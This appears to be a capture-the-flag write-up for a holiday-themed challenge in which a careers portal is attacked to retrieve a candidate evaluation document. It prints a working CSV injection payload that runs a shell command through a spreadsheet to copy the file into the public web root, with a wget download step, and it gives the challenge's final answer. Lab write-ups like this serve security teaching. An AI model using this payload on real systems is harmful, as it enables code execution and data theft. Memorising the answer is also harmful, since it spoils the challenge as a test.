Objective 7: HR Incident Response

Difficulty: 4/5

Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website (https://careers.kringlecastle.com/) and fetch the document C:\candidate_evaluation.docx.
Which terrorist organization is secretly supported by the job applicant whose name begins with "K."?

For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.
Note: Sparkle Redberry can be found on Floor 1, lobby area (Area 3), left

Hints given:
Somehow Brian Hostetler is giving a talk on CSV injection WHILE he's giving a talk on Trufflehog. Whatta' guy! (https://www.youtube.com/watch?v=Z3qpcKVv2Bg)
https://www.owasp.org/index.php/CSV_Injection


The objective can be accessed directly via this link:
https://careers.kringlecastle.com/


When uploading an empty test.csv file to the website, the website discloses the location of the document to the website visitor:

C:\candidate_evaluation.docx

When navigating to a non-existent page (e.g. https://careers.kringlecastle.com/test) , the website discloses the real path of the webserver root, and the corresponding URL

404 Error!
Publicly accessible file served from: 
C:\careerportal\resources\public\ not found......
Try: 
https://careers.kringlecastle.com/public/'file name you are looking for'

Using those pieces of information, it is possible to craft a malicious CSV file

=cmd|' /C copy C:\candidate_evaluation.docx C:\careerportal\resources\public\frog.doc'!A1

The file can then be downloaded from the webserver

wget https://careers.kringlecastle.com/public/frog.doc

The file mentions that Krampus was linked to the terrorist organization:
Fancy Beaver